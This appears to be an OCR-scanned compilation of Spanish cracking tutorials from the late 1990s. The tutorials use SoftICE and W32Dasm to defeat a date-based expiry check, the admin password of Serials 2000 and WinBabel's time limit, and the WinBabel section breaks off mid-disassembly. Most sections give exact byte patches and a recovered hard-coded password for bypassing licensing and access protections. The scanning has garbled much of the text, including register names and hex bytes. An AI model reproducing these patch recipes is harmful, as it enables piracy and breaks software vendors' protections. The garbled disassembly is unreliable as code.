:00403ECF FF15C8384100 Call dword ptr [004138C8] 


:00403ED5 A1AC124100 mov eax, dword ptr [004112AC] 


:00403EDA 3905A8124100 cmp dword ptr [004112*8], eax 


:00403EE0 7510 jne 00403EF2 


:00403EE2 85C0 test eax, eax 


:00403EE4 750€ jne 00403EF2 


:00403EE6 C605C423410001 mov byte ptr [004123C4], 01 


:00403EED E981000000 jmp 00403F73 


* Referenced by a (U)nconditional or (C)onditional Jump at Addresses: 


| :00403EE0 (C), :00403EE4(C) 


:00403EF2 8BO0ODAC1A4100 mov ecx, dword ptr [00411AAC] f Fecha limite 


:00403EF8 8B15941A4100 mov edx, dword ptr [00411A94] f Fecha actual 5 
AQUÍ PARA EL SICE 


:00403EFE 3BCA cmp ecx, edx K Se comparan 

:00403F00 7F6A Jg 00403F6C f Salta si se supera la fecha limite 
:00403F02 A1lA81A4100 mov eax, dword ptr [00411AA8] 

:00403F07 7C08 31 00403F11 f Salta si fecha actual < limite 
:00403F09 3B05901A4100 cmp eax, dword ptr [00411A90] 

:00403F0F 775B Ja 00403F6C f Salta si se supera la hora limite 

* Referenced by a (U)nconditional or (C)onditional Jump at Address: 


| :00403F07 (C) 


:00403F11 8B1D901A4100 mov ebx, dword ptr [00411A90] f Si fecha actual 
< fecha limite continua el programa. 


Como podeis ver hemos acodizado justo en la rutina de comparacion de 
fechas, lo primero que hace es Cargar en ECX los 4 segundos bytes del 
FILETIME que contiene la fecha limite, estos 4 ultimos bytes contienen 
el Dia/Mes/Año, y se comparan con los 4 ultimos del FILETIME de la 
fecha actual. Si se ha superado la fecha limite el programa salta a 
403F6C y la verdad es que no se que es lo que hace entonces, no ocurre 
nada! Algo habra tramado el programador porque si adelantas la fecha a 
31 dias despues de la fecha de instalacion no ocurre nada de nada, es 
mas, el nag de entrada desaparece. Como comienzo se puede cambiar en 
403F00 el JG 00403F6C por un JMP 403F6C dejara de salir el nag de 
comienzo y sea cual sea la fecha siempre evitara la nag, con esto 
supuestamente se consigue que el programa nunca Ccaduque. Sin embargo, 
como no me fiaba mucho de esto segui indagando un poquillo y retrocedi 
un poco hacia atrás. 


Este trozo de rutina que hemos analizado es llamado desde 403EE0 y 
403EE4, veamos esto: 


:00403ECF FF15C8384100 Call dword ptr [004138C8] 
:00403ED5 A1AC124100 mov eax, dword ptr [004112AC] 
:00403EDA 3905A8124100 cmp dword ptr [004112A8], eax 
:00403EE0 7510 jne 00403EF2 

:00403EE2 85C0 test eax, eax 

:00403EE4 750C jne 00403EF2 

:00403EE6 C605C423410001 mov byte ptr [004123C4], 01 


:00403EED E981000000 3jmp 00403F73 


Aquí tenemos claros los dos saltos condicionales en 403EE0 y 403EE4 JNE 
403EF2 que saltan hacia la rutina de comprobacion de la fecha, para que 
estos saltos no se realicen es necesatio que tanto lo que hay en la 
direccion 4112AC como lo que hay en la direccion 4112A8 sean 0. Si 
pones BPMD en esas dos direcciones y te pones a averiguar de donde 
salen te puedes kedar un poco pillao, asi que lo mejor es NOPear estos 
dos saltos y evitar siempre el calculo de la fecha. Dejamos correr el 
programa y vemos que el NAG no sale, la fecha no se comprueba y si nos 
vamos al menu de About vemos como el reiterado mensage de Unregistered 
evaluation copy es sustituido por nuestro nombre ;) 


Bueno, espero que os haya gustado mi primer tutorial, y que os haya 
servido de algo ;) si teneis alguna duda mi mail es 
i15780fgalileo.fie.us.es y como dice la peña esta del Wkt buscar al +0RC 
en la red. 
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Cracker XASX 
App Serials 2000 v6.0 


http: //serialz22000.da.ru 
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Appz URL 


Protección Administration Tools Password Requerida 


Para el password solo Softl ce v4.x... y para jugar con el código W32DSM y un Editor 


Herramientas : 
Hexadecimal. 


Introducción 


Hola a todos, este es un tutorial básico dedicado/ escrito para newbies. 
Intentaré explicar todo lo que pueda dando notas y conceptos interesantes. 


Espero que leyendo este tutorial aprendas y mejores tus cualidaded como cracker y aprendas algunos conceptos 
básicos. 

Esto no es un tutorial de 'cambia 74 a EB con el editor y mira como funciona', seguramente al acabar de leer esto 
(si eres un newbie) tengas algo nuevo en la cabeza :). 


La victima es el conocido Serials 2000 v6.0, una bonita recopilación de serials con una engine de busqueda muy 
buena... actualmente es la mayor lista disponible. 


Consiguelo (si es que no lo tienes ya), este programa hay que tenerlo, además asi podrás aplicar y practicar más 
facilmente con este tutorial. 


Ok, vamos a ver que protección tiene este programilla. 
Por cierto, mirad que conversación más interesante con el creador del Serials2000 :) 


<[Xasx]> ¡ get it in 2 min. 

<[Xasx]> or less 

<ThndrKiss> how? 

<ThndrKiss> the coder wants to know 

<[Xasx]> :) 

<ThndrKiss> because he put a anti-cracking routines in 
<[Xasx]> im cracker... 

<[Xasx]> of TNT 

<ThndrKiss> ¡ know 

<ThndrKiss> but was it easy?? 


Bueno, pues aquí va toda la desprotección para que veaís lo fácil que es saltarse unas cuantas 'anti-cracking 
routines' de esas que los programadores creen que han metido, pero realmente nosotros ni las veremos. 


Xasx / TNT! 
Cracking 
Serials 2k tiene una opción en el File Menu: Administration Tools que pide un PASSWORD. 


El sistema de protección del S2k es muy fácil de crackear, yo conseguí el password al minuto de ponerme a 
crackearle... cualquier cracker con mínimo nivel puede crackearle en un momento también. 


Solamente utilizaremos una herramienta para conseguir el password... como no, Softl ce (v3.x O 4.x). 


Asumo que tienes instalado y configurado correctamente el Softl ce, y que sabes como hacer cosas básicas como 
poner un breakpoint y todo eso. 


Si no sabes nada de usar Softl ce o ni si quiera le tienes instalado, primero leete un tutorial sobre como hacerle 
funcionar y luego vuelve aqui :). 


Bueno, entonces tenemos Softl ce listo y el Serials 2k esperando ser crackeado. 


El primer paso es ver que tenemos... 
Una ventana que pide un password y los botones de Ok o Cancelar. 


Si ponemos un password inválido, nos saldrá una messagebox que dice '| ncorrect Password. 


Ok, todo normal... ahora nuesto 'amado' Softl ce deberá trabajar un poco; necesitamos saber que hace el 
programa cuando pulsamos el boton OK. 


Para hacer esto tenemos que poner un breakpoint en el Softl ce, la mejor elección es 'romper' la aplicación cuando 
coge el password que hemos metido. Tenemos varios breakpoints (BPX) posibles para hacer esto, los más 
utilizados son: 


e GetDlgltemTextA 
e GetWindowTextA 


Como inicialmente no sabemos cual va a funcionar, pondremos los dos en el softice a ver q pasa. 


Abre el Softl ce (CTRL+D) 
bpx getdlgitemtexta 
bpx getwindowtexta 


Notas sobre los breakpoint: 


para listar todos los BPXs en Softl ce, escribe bl. (BreakPoint List) 

para borrar todos los BPXs en Softl ce, escribe be*. (BreakPoint Clear *= Remove All Set BreakPoints) 

para desactivar todos BPXs en Softl ce, escribe bd*. (BreakPoint Disable *= Disable All Set BreakPoints) 

para activar todos los BPXs en Softlce, escribe be*. (BreakPoint Enabler *= Enable All Set BreakPoints) 

* puede ser cambiado por el número de breakpoint que queramos para activar/desactivar/borrarle. Ejemplos: bel | bd2 | 
bel,2 | bc1,2 


Esto hará al Softl ce 'saltar' cuando la aplicación coja nuestro password. 
Ok, vamos a probar si funciona... introduce un password... por ejemplo: crackisfun y entonces pulsa OK. 


jejeje, bienvenido a Softl ce :), ahora mismo estamos un paso después de que se haya cogido el password con la 
llamada getwindowtexta. 


Lo primero de todo, miramos en la barra verde esa de abajo del softice... estamos situados en código del USER32!. 
Esto no es dónde queremos llegar pq no es el Serials 2k exe. Para llegar a nuestro objetivo tenemos que ir 
saliendo de estas llamadas (calls). 


Pulsa F11 (para salir de la call) una vez para volver de la llamada actual, ok, ahora estamos en código del MFC42!. 
Esta es una DLL que usa el programa para funcionar. 

Podemos ver la instrucción RET (Return)... pulsa F1O (ejecutar la siguiente instrucción) varias veces para dejar 
esta Call, después pulsa F1O y cuando pasamos el último RET ya nos situamos en código del Serials2k.... 

Bueno, solo hay dos instrucciones y después otro RET... pulsa otra vez F1O para salir de esta llamada... otra vez 
en código del MFC42!... pulsa F1O varias veces hasta llegar al RET y salir de esta llamada. 


Por Fin!, ya estamos en código del Serials2k!... hmm y parece interesante :) 
Nota: para moverte en la ventana de código debes usar CTRL+up o CTRL+down. 


Podemos ver este código: 


:00403445 EB8AECFOOOO Call 004103F8 

:0040344A 8B86E4000000 mov eax, dword ptr [esi+000000E4] | Aquí aparecemos 
:00403450 8378F808 cmp dword ptr [eax-08], 00000008 
:00403454 7536 jne 0040348C 

:00403456 803868 cmp byte ptr [eax], 68 
:00403459 7531 jne 0040348C 

:0040345B 80780161 cmp byte ptr [eax+01], 61 
:0040345F 752B jne 0040348C 

:00403461 80780263 cmp byte ptr [eax+02], 63 
:00403465 7525 jne 0040348C 

:00403467 8078036B cmp byte ptr [eax+03], 6B 
:0040346B 751F jne 0040348C 

:0040346D 80780474 cmp byte ptr [eax+04], 74 
:00403471 “7519 jne 0040348C 

:00403473 80780568 cmp byte ptr [eax+05]1, 68 
:00403477 7513 jne 0040348C 

:00403479 80780669 cmp byte ptr [eax+06], 69 
:0040347D “750D jne 0040348C 

:0040347F 80780773 cmp byte ptr [eax+07], 73 
:00403483 7507 jne 0040348C 

:00403485 C7466001000000 mov [esi+60], 00000001 
:0040348C 8BCE mov ecx, esi 

:0040348E E8D9CDO000 Cal1 0041026C 

:00403493 5E pop esi 

:00403494 C3 ret 


Analisis del código paso por paso: 

Nota: para avanzar a la siguiente instrucción en el Softl ce, se usa FLO. 

He dividido el código en 2 grupos... el primero es este: 

Bueno, empezamos en el offset 0O40344A. Como podemos ver el registro DS contiene un número... si el password 
que metimos fue 'crackisfun', entonces, el númbero es 009. hmm nuestro password tiene 9 caractéres... pulsa F1O 


para avanzar a la siguiente instrucción 


La siguiente instrucción es: 


:0040344A 8B86E4000000 mov eax, dword ptr [esi+000000E4] | Inicio, ve longitud de nuestro 
passw 

:00403450 8378F808 cmp dword ptr [eax-08], 00000008 | Comparacion longitud Password 
:00403454 7536 jne 0040348C | Salta si nuestra longitud del password no es 8 
¿QUUOTARIA sia res (segundo grupo) ...... 

:0040348C 8BCE mov ecx, esi | el offset donde salta... 


:0040348E E8D9CD0O000 
:00403493 5E 
:00403494 C3 


Cal1 0041026c | llamada no importante 
pop esi | pone O al registro esi 
ret | vuelve de la llamada... adios 


La segunda instrucción hace una comparación: (( dword ptr [eax-08] )) con (( 8 )). 


Hecha un vistazo al registro EAX... pon: db eax en Softl ce para localizar en la ventana de datos Datos de 
Registro EAX, ohhh!!!, estamos viendo nuestro pasword!... entonces s2k esta comparando “el número de 
caracteres de nuestro password" con “8”... 


después de la comparación hay una instrucción J NE (Salta si no es igual). 
Todo esta realmente claro: 


si “el número de caracteres de nuestro password' no es igual a '8'... la siguiente instruccion dará el salto al offset 
designado. 

si “el número de caracteres de nuestro password' es igual a '8' la siguiente instrucción no hara el salto 
condicional y continuaremos en la siguiente instrucción. 


hmm, nuestra contraseña tiene 9 caractéres... 
Entonces la instrucción J NE saltará... si, lo hace. 


Intenta poner una password de 8 caractéres en el s2k, por ejemplo: 'tntpower' y vuelve a este código de nuevo... 
hmm no salta ahora :) 


Bueno, ya sabemos que el password correcto tiene 8 caractéres. 


Segundo 'grupo' de Instrucciones... 


:00403456 803868 cmp byte ptr [eax], 68 
:00403459 7531 jne 0040348C 

:0040345B 80780161 cmp byte ptr [eax+01], 61 
:0040345F 752B jne 0040348C 

:00403461 80780263 cmp byte ptr [eax+02], 63 
:00403465 7525 jne 0040348C 

:00403467 8078036B cmp byte ptr [eax+03], 6B 
:0040346B 751F jne 0040348C 

:0040346D 80780474 cmp byte ptr [eax+04], 74 
:00403471 “7519 jne 0040348C 

:00403473 80780568 cmp byte ptr [eax+05], 68 
:00403477 7513 jne 0040348C 

:00403479 80780669 cmp byte ptr [eax+06], 69 
:0040347D “750D jne 0040348C 

:0040347F 80780773 cmp byte ptr [eax+07], 73 
:00403483 7507 jne 0040348C 

:00403485 C7466001000000 mov [esi+60], 00000001 
:0040348C 8BCE mov ecx, esi 

:0040348E E8D9CDO000 Cal1 0041026C 

:00403493 5E pop esi 

:00403494 C3 ret 


Vamos a analizar estas instrucciones... es fácil de ver... 8 comparaciones y 8 instrucciones J NE 'salta si no es igual". 
Recuerda que en el registro EAX esta situado nuestro password, si estamos aquí es porque nuestro password tiene 
8 Caractéres, y ahora hay 8 comparaciones :)... no necesitas pensar demasiado para ver lo que va a ocurrir aquí. 


Exacto, cada caracter de la contraseña será comparado con algo y si no es igual alguno de ellos pues saltara al 
offset designado. 


La primera comparación es: (( byte ptr [eax] )) con (( 68 )) 


byte ptr [eax] = primer caracter de EAX...en EAX esta situada nuestra password. 
68 = Ascii.... usa Softlce para convertir 68 (escribe ?68) y te saldrá: 'h'. 


Si el primer caracter de EAX es igual a 'h' entonces no saltará y continuaremos con la siguiente instrucción... 


Como puedes ver todas las comparaciones son del mismo estilo... 


La primera comparación es: (( byte ptr [eax] )) con (( 68 )) 
La segunda comparación es: (( byte ptr [eax+1] )) con (( 61 )) 
La tercera comparación es: (( byte ptr [eax+2] )) con (( 63 )) 
La cuarta comparación es: (( byte ptr [eax+3] )) con (( 6 
La quinta comparación es: (( byte ptr [eax+4] )) con (( 
La sexta comparación es: (( byte ptr [eax+5] )) con (( 68 ) 
La séptima comparación es: (( byte ptr [eax+6] )) con (( 6 
La octava comparación es: (( byte ptr [eax+7] )) con (( 73 


B )) 
74 )) 
) 
9)) 
)) 
Entoces el password correcto es: 

68(h) 6l(a) 63(c) 6b(k) 74(x) 68(x) 69x) 730) 
x = hazlo tu mismo :) 


ok, ya está hecho todo el trabajo... como puedes ver ha sido realmente fácil conseguir el password correcto... solo 
hemos necesitado analizar un poco el código. 


Ahora vamos a jugar un poco... conseguir solo el password no es suficiente para nuestras retorcidas cabezas :). 


Jugando con el Código 12Parte 
INTRODUCIR CUALQUIER PASSWORD 


hmm, ¿porqúe tenemos que poner siempre el password para entrar al menú? ahora podemos jugar con el código y 
hacer que acepte cualquier password... es facilito, ya lo verás. 


Observa que el checkeo de longitud de password o cada checkeo de los caractéres tiene un J NE, dirigido 
hacia el offset 0O040348C. 

Esto hace que si el password no es correcto, se nos salta el offset 00403485 y por lo tanto no se cumple la 
instrucción, que debería mover 1 (mov) a la posición [esi+60)]. 


Este 1 le dice al programa en un posterior checkeo (que no hace falta ni buscar) si hemos introducido el password 
correcto. 


:00403483 7507 jne 0040348C 


:00403485 C7466001000000 mov [esi+60], 00000001 
:0040348C 8BCE mov ecx, esi 


¿Como podemos arreglar esto?... si, hay varios métodos... 
e Cambiar todas las instrucciones JNE por NOP (nop=instrucción que no hace nada). 


Esta es una forma muy sucia... demasiados bytes parcheados... funcionará, pero yo creo que cuantos 
menos bytes parcheados mejor es el crack. 


e Hacer al código saltar directamente a 00403485 (la intrucción que pone 1 en [esi+60]) 
Esta es una forma más limpia... solo 2 bytes serán cambiados. 


Ok, entonces cambiaremos el primer J NE (el del checkeo de longitud) a un J MP (el J MP hace que salte siempre... 
ya no es una condición) a donde queremos. 


Original: 00403454 “7536 jne 0040348C 


Primero haz los cambios en el Softl ce (antes de hacer una modificación real en el fichero) para probar si todo va 
bien. 


Para hacer el cambio, vete a ese offset (comienza el proceso usando F1O para llegar allí). 
Cuando ya estes situado en el offset q queremos, escribe: a 


Ahora puedes editar ese offset... escribe la nueva instrucción: jmp 403485 y pulsa enter. 


Parcheado: 00403459 EB2F jmp 00403485 


Los bytes han sidos cambiados (en memoria), después de haber hecho esto, desactiva todos los breakpoints (ld) 
y continua la ejecución normal, .. 


whouuu!!!!, funciona perfectamente :), ahora s2k acepta cualquier cosa q pongamos, incluso una password en 
blanco. 


Haré una explicación cortita de como parchear el ejecutable permanentemente... 

Coje un buen editor hexadecimal como por ejemplo hiew (dos) o ultraedit (windows), vete al offset donde esta la 
instrucción que queremos cambiar y modifica sus bytes. 

Estos son los bytes originales: 75 36 | Y estos los cambiados: EB 2F 

(La traducción a hexadecimal la obtienes en el softice) 

Para ir a la localización exacta, utiliza un conversor de offset/hex. 


Jugando con el Código 22Parte 
DIRECTAMENTE AL MENÚ 


Bueno Bueno... :)... esto cada vez se pone más interesante. 


Ya hemos conseguido el password, hemos hecho que acepte cualquier cosa que metamos... que nos falta? 

aha, la perfección :)... y para que queremos que nos salga ese menú de meter el password si aceptará cualquier 
cosa?, ahora vamos a hacer que directamente cuando le demos a la opción en la barra de menú se salte el rollo 
ese de meter el password y nos abra directamente la ventana con las opciones de 'administrador.. 


Ya has visto lo facil que es trabajar con el código y modificarle sabiendo que es lo que hace. 
Ahora tampoco se va a complicar mucho más, pq solo tenemos que hacer una busqueda y unos pequeños cambios 
teniendo en cuenta todos los conocimientos que hemos adquirido sobre este programa anteriormente. 


Ok, vamos al atakeerrrr! 
Organización... 
ler Paso: Buscar llamada al Menu 'Administration Tools' 


22 Paso: Hacer que se salte el menu ese del password y que vaya directamente a donde queremos, teniendo en 
cuenta q la llamada que se hace al menu del password devuelve una respuesta como ya sabemos (recordad el 
mov 1 a esi+60). 


3er Paso: Hacer permanentes nuestros cambios en el ejecutable e irnos por hay a dar una vuelta con la novia 
(eso solo si teneís la suerte de tener una :))). 


Comenzamos, 

Como lo que buscamos es la creación de un menú, lo mejor para encontrar quien o que llama a este menú será 
desensamblar el ejecutable con el W32DSM. 

Hacemos una copia del ejecutable y la desensamblamos... ningún problema para hacerlo... ni Antiw32dsm, ni 


encriptaciones, ni compresores... nada... joer q rollo :) 


También podriamos hacerlo con Softl ce, pero mejor usamos W32DSM para q resulte más facil y veamos como 
atacar a la victima con distintas aplicaciones. 


Pues para buscar el menú que nos interesa no tenemos más que mirar en el DIALOG | NFORMATION que está al 
principio de la 'dead list": 


Name: DialogID_0092, * of Controls=004, Caption:"Password Verification", ClassName:"" 
001 -—- ControlID:0406, Control Class: "EDIT" Control Text:"" 

002 -— ControlID:0001, Control Class: "BUTTON" Control Text: "sok" 

003 -—- ControlID:0002, Control Class:"BUTTON" Control Text: "sCancel" 

004 -— ControlIlD:FFFF, Control Class: "STATIC" Control Text:"Enter Admin. Password:" 


Aquí lo tenemos... 
El dato más importante es el de 'Dialogl D_0092', que nos servirá para encontrar cuando es llamado este menú. 


Damos a Search, Find Text, y ponemos 'Dialogl D_0092... ploff... hay está :) 
* Possible Reference to Dialog: DialogID_0092 


Ahora solo tenemos que subir para arriba y observar quien hace referencia a esta llamada... bueno ya lo sabemos 
(el click al menú de arriba)... pero lo que queremos saber realmente es donde ocurre esto. 


Pues subimos unas cuantas líneas y hay está!. 


* Referenced by a CALL at Address: 
| :00402974 


Jeje, una CALL ha llamado aquí... exactamente ha sido la localizada en el OffSet 00402974... ya tenemos a 
nuestra victima rodeada, bueno vamos allí a ver q encontramos. 


:00402974 E837090000 call 004032B0 
:00402979 8D8C24A4000000 lea ecx, dword ptr [esp+000000A4] 
:00402980 C784249401000000000000 mov dword ptr [esp+00000194], 00000000 


* Reference To: MFC42.Ordinal:09D2, Ord:09D2h 


:0040298B E8E8D80000 Cal1 00410278 

:00402990 83F801 cmp eax, 00000001 

:00402993 7571 jne 00402A06 

:00402995 8B842404010000 mov eax, dword ptr [esp+00000104] 
:0040299C 6A00 push 00000000 

:0040299E 85C0 test eax, eax 

:004029A0 7452 je 004029F4 


hmm, interesante... 


A mi ya se me ocurre una idea de que hace aquí el programa... pero mejor vamos directamente a Softl ce a verlo 
en tiempo de ejecución. 


Para esto hay q poner un Breakpoint en el offset 402974, ah, ahora recuerdo que esto suele causar problemas a 
muchos newbies. 

Voy a explicar como poner correctamente el Breakpoint para evitar mensajes como 'I nvalid Address' o que no 
funcione. 


Softl ce necesita que le demos una referencia de que app debe ser la actuada mediante el breakpoint. Para esto 
usaremos el Symbol Loader, aplicación incluida con Softl ce que tendrás en tu carpeta de Numega Softl ce. 


Ok, abrimos el symbol loader, y en File/Open Module abrimos el ejecutable del Serials 2000. 
C:YProgram FilesiSerials 20001 Serial2k.exe - loaded successfully 


Bueno, ahora para ejecutarle no tenemos mas que dar en Module/ Load o el icono de los engranajes. 
Nos saldrá un error sin importacia, le damos ok, y sigue la ejecución del Serials 2k. 


Plof!, Softl ce aparece ante nuestros ojos... este es el momento perfecto para meter el breakpoint. Como podrás 
comprobar en la barrita verde aparece que esta procesando en el ejecutable del Serials 2000. 


Metemos el BreakPoint: BPX 402974, y le damos a F5 para que continue cargando. 
Ya está el anzuelo puesto jejeje, ahora solo tenemos que hacerle picar. 
Pulsamos File/Administration Tools... y... como queriamos, Softlce salta antes de que aparezca ninguna ventana 


inutil. 


Estamos viendo el código que anteriormente veíamos con W32DSM... con la ventaja de que ahora podemos ver 
que hace cada llamada y los posteriores saltos. 


:00402974 E837090000 call 004032B0 

:00402979 8D8C24A4000000 lea ecx, dword ptr [esp+000000A4] 
:00402980 C784249401000000000000 mov dword ptr [esp+00000194], 00000000 
:0040298B E8E8D80000 Cal1 00410278 

:00402990 83F801 cmp eax, 00000001 

:00402993 7571 jne 00402A06 

:00402995 8B842404010000 mov eax, dword ptr [esp+00000104] 
:0040299C 6A00 push 00000000 

:0040299E 85C0 test eax, eax 

:004029A0 7452 je 004029F4 


Aparecemos en 402974 como nuestro breakpoint le había dicho al fiel Softl ce, pulsamos F10 para pasar a la 
siguiente instrucción y observamos que no ocurre nada (en pantalla), seguimos hasta la siguiente call y al pulsar 
F10 sobre está nos aparece la ventana de introducir password. 

Ya sabemos donde está la función que abré esa ventana. Si nos metemos en la call (con F8) y damos unas cuantas 
vueltas, llegaremos hasta el código dónde se encuentran las comparaciones que hemos estudiado anteriormente. 
Pero ahora no es necesario eso. 


Solo tenemos que anular esa llamada y adecuar la comprobación de la respuesta que se obtiene a nuestras 
necesidades. 


Primero vamos a hacerlo todo en un modo temporal para ir comprobando que sucede con cada instrucción 
importante. 


La primera instrucción (call 004032b0) aparentemente no hace nada que no queramos, por lo que no la 
cambiamos. 


La siguiente call es la que llama a la ventana de meter el password... vamos a deshacernos de ella, cambiando sus 
bytes actuales por NOPs (90). 

Cuando estamos situados en 0040298B, escribimos DB 40298B, entonces en la ventana de datos (arriba) 
aparecerán los bytes de esta instrucción. 


Pues pulsamos con el botón del ratón arriba en el primero y sustituimos todos los bytes por 90. 


Entonces quedaría asi: 


Inicialmente: E8 E8 D8 00 00 
Modificado: 90 90 90 90 90 


Cuando pulsamos intro, vemos como en la ventana de instrucciones hay un cambio y aparecen 5 nops en vez de la 
anterior call. 


ya podemos ir pulsando F10 y pasando cada NOP. 


Hasta que llegamos a los saltos de comprobación. 


:0040298B E8E8D80000 Cal11 00410278 5 Nops <> Call q llama al password. 
:00402990 83F801 cmp eax, 00000001 | Compara EAX con 1... 

:00402993 “7571 jne 00402A06 |Salta si EAX no es = 1 

:00402995 8B842404010000 mov eax, dword ptr [esp+00000104] 

:0040299C 6A00 push 00000000 

:0040299E 85C0 test eax, eax | Comprueba si EAX es 0 

:004029A0 7452 je 004029F4 [Salta sies 0 


Como vemos al ir pulsando F1O por el código, después de la primera comparación, saltará y entonces el programa 
no hará nada. Eso es equivalente a que pulsemos el botón Cancel en la ventana de meter el password. 


La segunda comparación (test eax, eax) y su correspondiente salto condicional también hacen de las suyas :). 
Aquí también saltará al offset 0O4029F4, haciendo aparecer directamente el messagebox de Invalid Password. 


Pues ya está todo resuelto... nos tenemos que deshacer de la call que llama a la ventana de password y evitar los 
dos saltos condicionales. 


Podriamos dejarlo 'mu pofesional' convirtiendo el primer call en una instrucción que nos mueva a EAX un 1, y asi el 
salto condicional que tenemos a continuación no saltase nunca. 

Después hay una instrucción que mueve a EAX algo situado en esp+00000104. Si lo que mueve es un 0, el salto 
condicional de la siguiente línea nos llevará a la ventana de 'invalid password', entonces pondremos un 1 también, 
asi este salto se portará adecuadamente y nos dejará seguir sin problemas. 


Todo esto son pijadillas... para hacer algo rapido podemos llenar de NOPs la call y los saltos y seguro que 
funciona. Pero esto demuestra que sabemos lo que estamos haciendo. 


El cambio lo realizamos en memoria con Softl ce... 
Esto ya debería estar claro como hacerlo. 


Para que el programa se vuelva a cargar en memoria correctamente (anulando todos los cambios que hicimos 
anteriormente), le cerramos y le volvemos a cargar con el Symbol Loader. 


Entonces activamos nuestro efectivo breakpoint en 402974 y comenzamos con las modificaciones finales. 


Usando F10, llegamos hasta 0040298B. Escribimos a en softice y hacemos nuestra bonita modificación de mover a 
EAX un 1 :). 


a [enter] 
mov eax, 1 


Ya está.. hmmm pero tenemos que tener en cuenta una cosa. La anterior instrucción (la call) usaba 5 bytes, 
hemos tenido suerte, y nuestra instrucción (el mov) ocupa también 5. Entonces no tendremos q añadir nada para 
rellenar. 


Entonces el código quedaría asi: 
Inicialmente: E8 E8 D8 00 00 (call 00410278) 
Nuevo código: B8 01 00 00 00 (mov eax, 1) 


Ahora nos queda hacer el otro cambio... es en 402995. 
Nos situamos allí y escribimos a en Softl ce. Ahora ponemos lo que queremos: 


mov eax, 1 


ya está... hmmmmmm ahora si que tenemos el 'problema' ese. Nuestra nueva instrucción ocupa 5 bytes, y la 
antigua ocupaba 7. 
Bueno, solamente tendremos que rellenar los dos bytes de diferencia con 2 nops. 


Ponemos DB 402995 en softl ce, y en la parte de arriba nos aparecen los bytes de ese offset. 
Solo tenemos que poner 90 90 en el 00 00 que queda al final de la instrucción y ya está arreglado. 


Entonces el código quedaría asi: 
Inicialmente: 8B 84 24 04 01 00 00 (mov eax, dword ptr [esp+00000104]) 
Nuevo código: B8 01 00 00 00 90 90 (mov eax, 1| nop | nop ) 


Resumen: 

Código Inicial: 

:0040298B E8E8D80000 Call 00410278 | Llamada a la ventana de Password 
:00402990 83F801 cmp eax, 00000001 | Eax no es 1 si damos cancel 
:00402993 7571 jne 00402A06 | Vuelve al programa 


:00402995 8B842404010000 mov eax, dword ptr [esp+00000104]| a eax resultado checkeos 
:0040299C 6A00 push 00000000 

:0040299E 85C0 test eax, eax | Comprueba si eax es 0. 

:004029A0 7452 je 004029F4 | Si es 0, salta a Invalid password. 


Código 'Reparado': 


:0040298B B801000000 mov eax, 1 | (Nuevo) -—- Mueve 1 a eax 
:00402990 83F801 cmp eax, 00000001 | Eax siempre será 1 
:00402993 7571 jne 00402A06 | Nunca saltará 

:00402995 B801000000 mov eax, 1 | (Nuevo) Mueve 1 a eax 
:0040299A 90 nop | (relleno) 

:0040299B 90 nop | (relleno) 

:0040299C 6A00 push 00000000 

:0040299E 85C0 test eax, eax | eax lo pusimos en l... 
:004029A0 7452 je 004029F4 | Nunca saltará 


Ok, ya está, ahora le damos en File/Administrationm Tools y directamente nos abré la ventana de opciones sin 
pedir ni password ni leches. :) 


El cambio para que sea permantente en el ejecutable se realiza como ya explique antes... solo hay que modificar 
los bytes con un editor hexadecimal y listo. 


Despedida, agradecimientos y esas cosas.... 


Ha quedado un tutorial bastante extenso, pero es lo que ocurre cuando se explica todo y no se da nada por 
supuesto... cosa que he intentado hacer (menos en lo de parchear los ejecutables) para que nadie se quede con 
dudas o atascado en cierto punto o haga cosas solo porque las pone aquí sin razonar el porqué. 


Si os ha gustado este tutorial hacedmelo saber escribiendome a tntcrackteamt hotmail.com. 
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WinBabel V4.2 (Pac) 


CRACKER: “DeeJay”? 


Proteccion: Limitacion de Tiempo Funciona 5 minutos si y 5 no 
Proteccion de Integridad (No poder modificar el ejecutable) 
URL: www.winbabel.com. 

Herramientas: W32Dasm + SOFTICE + Hworks32 


INTRODUCCION 


Hora 00:00 es la hora de hacer algo para no aburrirme: 

Ojeando un cd que tengo por aqui entre todos mis trastos, veo un 
programilla en la sección traductores, y tras leer la descripcion creo 
que puede ser entretenido. 

Se trata de un programa que traduce todos los menus de todos los 
programas de win, asi como lo que copiemos al portapapeles, y para 
mas colmo las paginas web, y todo en tiempo real, claro que esto 
relentiza un poco la maquina por que tiene que ir traduciendo. 


AL ATAKE 


Pues nada manos a la obra... 

ler contacto 

Lo primero sera buscar al go que nos llame la atención, ejecutamos el 
programa, y Ojeamos, uUMMMNRMM... 

nos damos cuenta de varias cosas, por ejemplo que no se registra 
mediante numero de serie, y que en la parte superio1 pone 
winbabel(PAC), osea que el texto PAC no tiene que aparecer en la 


version registrada. 

Bien sigamos atentos, que pasa cuando se cumplen los primeros 5 
minutos... bien vemos que nos sale una bonita pero molesta nag 
diciendo que esta Winbabel PAC traduce 5 minus si 5 minutos no 
Bien ya tenemos por donde empezar. 

Al atakerr 

Cargamos el W32Dasm y buscamos la cadena Winbabel PAC: 

* Referenced by a (U)jnconditional or (C)jonditional Jump at 
Addresses: 

1:0003.5F4F(U), :0003.5F83(C), :0003.5F8A(C), :0003.5F99(C) 


:0003.5FAO 837E0A00 cmp word ptr [bp+0A], 0000 
:0003.5FA4 7427 je 5FCD 

:0003.5FA6 837EFE0O1 cmp word ptr [bp-02], 0001 
:0003.5SFAA 7521 jne 5FCD 


* Possible Reference to Dialog: DialoglID_0001, 
CONTROL _1D:0004, "No registrado!!" 


:0003.5FAC 6A04 push 0004 
:0003.5FAE 16 push ss 


* Possible StringData Ref from Data Seg 064 -"WinBabel PAC 
(Probar Antes de " 

-"Comprar)" 

| 

:0003.5FAF 688D0C push 0CSD 

:0003.5FB2 16 push ss 


* Possible StringData Ref from Data Seg 064 -"WinBabel PAC 
traduce 5 minutos " 
-"siy 3 no." 


:0003.5FB3 68C10B push OBC1 
:0003.5FB6 OE push cs 


:0003.5FB7 ESD8P9 call 5992 
:0003.5FBA 83C40A add sp, OOOA 
:0003.5FBD 3D0600 cmp ax, 0006 
:0003.5FCO 750B ¡ne 5FCD 
:0003,5FC2 16 push ss 


* Possible StringData Ref from Data Seg 064 -"registro.exe" 


:0003.5FC3 68B40C push 0CB4 
:0003.5FC6 6A05 push 0005 
:0003.5FC8 9A FFFF000O call KERNEL.WINEXEC 


Si nos fijamos en las condicones tenemos una incondicional y varias 
condiciones, y a juzgar por las direcciones estan muy juntas vamos a 
verlas... 


:0003.5F7C 9AFFFE00OO call 0001.0ESEh 

:0003.5F81 0BD2 or dx, dx 

